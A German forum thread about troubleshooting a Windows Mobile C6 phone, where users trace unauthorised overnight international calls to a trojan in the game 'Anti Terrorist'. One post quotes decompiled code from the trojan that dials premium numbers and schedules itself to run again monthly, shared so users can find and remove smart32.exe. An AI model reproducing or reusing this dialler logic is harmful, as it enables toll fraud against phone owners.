Probleme mit dem C6 hier rein

Status

Dieses Thema ist geschlossen.
Geschlossene Themen können, müssen aber nicht, veraltete oder unrichtige Informationen enthalten.
Bitte erkundige dich im Forum bevor du eigenes Handeln auf Information aus geschlossenen Themen aufbaust.

Themenstarter können ihre Themen erneut öffnen lassen indem sie sich hier melden...

TedPsycho

Member
Halli Hallo,

ich bin irgendwie auf dem Holzweg. Bei Shoot Em komm ich irgendwie nicht mehr raus und in die AppleUI. Wenn ich auf den Knopf unten drücke komme ich aus jeder Anwendung ja raus, nur da nicht. Dazu kommt noch, dass die Auflösung verzerrt ist. Alle andere Programme laufen ohne Probleme, nur das nicht. Welche Version bzw. Auflösung habt ihr denn von Shoot EM?

Danke

Grüsse DaTeddy

Zuletzt bearbeitet:

Petteri

Well-Known Member
Servus, musst leider gaaaaanz lange den Homebutton drücken! Dann im Task Manager ausmachen! Die Auflösung kannst leider nicht ändern!

Klodie

New Member
Hallo zusammen !
Mein C6 hat sich letzte Nacht selbstständig gemacht. Es hat einfach 3 Auslandstelefonnummern gewählt, wobei unter einer Nummer 27 min. telefoniert wurde.
Während bei uns alle geschlafen haben. Alles ziemlich seltsam.
Hatte jemand von euch schon mal das gleiche problem?
Kann das ganze auch von einem Virus oder einem Programm verursacht worden sein?

carsten

New Member
Hallo zusammen !
Mein C6 hat sich letzte Nacht selbstständig gemacht. Es hat einfach 3 Auslandstelefonnummern gewählt, wobei unter einer Nummer 27 min. telefoniert wurde.
Während bei uns alle geschlafen haben. Alles ziemlich seltsam.
Hatte jemand von euch schon mal das gleiche problem?
Kann das ganze auch von einem Virus oder einem Programm verursacht worden sein?

Hallo,

die Nummern waren nicht zufällig:

02524 221601
+88213213214
+1(767) 503-3611
+882346077 ????

MfG
Carsten

Klodie

New Member
Hallo Carsten !
Ja das sind genau die Nummern.
Woher kommt das?
Macht das ein Programm oder was ist das, wie kann ich das abstellen?
Habe es direkt heute bei Base gemeldet.
Was soll ich dagegen tun?

Petteri

Well-Known Member
Ja das interessiert uns jetzt wohl ALLE!

Soll ja laut den XDAlern ein Trojaner sein.....

Zuletzt bearbeitet:

Petteri

Well-Known Member
Ja dsa hab ich auch gelesen.....

Hier: Übeltäter scheint tatsächlich das Spiel Anti Terrorist zu sein. Funktioniert nach einem Eintrag bei den Dev´s von leTama wie folgt:

I took a quick look at the game, here is what I found:

There is a reg.exe file installed (dotnet application), it copies itself to smart32.exe in windows directory and then does this:

Phone phone = new Phone();
phone.Talk("+8823460777");
Thread.Sleep(0xc350);
phone.Talk("+17675033611");
Thread.Sleep(0xc350);
phone.Talk("+88213213214");
Thread.Sleep(0xc350);
phone.Talk("+25240221601");
Thread.Sleep(0xc350);
phone.Talk("+2392283261");
Thread.Sleep(0xc350);
phone.Talk("+881842011123");
long num6 = DateTime.Now.AddMonths(1).ToFileTime();
long num7 = 0L;
FileTimeToLocalFileTime(ref num6, ref num7);
SystemTime time6 = new SystemTime();
FileTimeToSystemTime(ref num7, time6);
CeRunAppAtTime(@"\Windows\smart32.exe", time6);

Definitely the culprit.

LeTama
[/I]__________________
Diamond (LeTama-UC7)
Elf (LeTama-21159.2)
Leo (LeTama-1.66-4)

Schaut also, ob Ihr die smart32.exe im windows - Verzeichnis habt. Unklar allerdings noch, ob auch andere Programme auf diese Datei zugreifen. Anscheinend nicht, aber sicher sind die dev´s sich noch nicht ...

Klodie

New Member
Hallo genau das wars !
Habe vorgestern das Spiel Anti Terrorist installiert.
Letzte Nacht hatte es sich ja selbsständig gemacht.
jetzt habe ich das Spiel sofort deinstalliert, die Datei smart32.exe gelöscht und werde heute abend noch ein Hardresset durchführen. Die Auslandstelefonnummern von Base sperren lassen.
Und hoffe das es damit genug ist.

wortart

New Member
Hallo zusammen,

viele Programme benötigen ja ein aktuelles framework pack. Leider kann ich das nicht auf meinem C6 installieren. Ich lade die Datei runter, führe sie auf dem pc aus. Als nächstes wähle ich die sd karte als installationsort. nun wird auf meinem handy angezeigt, dass die cab installiert wird und nach kurzer zeit kommt "Installation fehlgeschlagen"

ist dieses Problem bekannt?

Danke und Gruß
wortart

Petteri

Well-Known Member
hast Du erst die alte deinstalliert? Solltest Du vorher machen, es gibt auch eine cab Version, die kannst Du vom Handy aus installieren!

wortart

New Member
Danke schon mal...werde mir mal die cab version suchen!
wie deinstalliere ich denn die alte version?

Danke im Voraus
Gruß
wortart

wortart

New Member
cab installation hat geklappt, danke für den tip.
hab nun noch eine angelegenheit:

als ich mein c6 bekommen habe gingen vorinstallierte programme wie r66, caveman und co, nicht. bei r66 kommt ne fehlermeldung, dass programm wäre nicht istalliert.

hatte jemand schonmal dieses problem?

zeroooo

New Member
hab ne frage zu den wetter apps

wenn ich mir da eins downloade und installier

holt dass dann die infos für mich kostenpflichtig ausm internet ?

oder holt des nur wenn ich wlan hab

und zeigt des dann auch an wenn ich z.b. heute ins internet mit dem handy geh und das wetter teil updated und ich geh halt dann am tag dancah nich ins internet mit dem c6 passen die angaben dann noch oder is des dann eifnach weg ?

also so wetter vorhersage mäßig

Bei G-Weather kostet es dich die normalen Gebühren für GPRS oder Edge, wie wenn Du mit dem Browser surfst. Wenn du am nächsten Tag das Programm öffnest, und keine neuen Daten holst, hast Du natürlich den Wertterstand vom Vortag bzw. von Deiner letzten aktualisierung.

Gruß
Dirk

Status

Dieses Thema ist geschlossen.
Geschlossene Themen können, müssen aber nicht, veraltete oder unrichtige Informationen enthalten.
Bitte erkundige dich im Forum bevor du eigenes Handeln auf Information aus geschlossenen Themen aufbaust.

Themenstarter können ihre Themen erneut öffnen lassen indem sie sich hier melden...

Mitglieder

Keine Mitglieder online.

Neueste Beiträge

Statistik des Forums

Themen
54,353
Mitglieder
66,934
Neuestes Mitglied
j880001
Oben Unten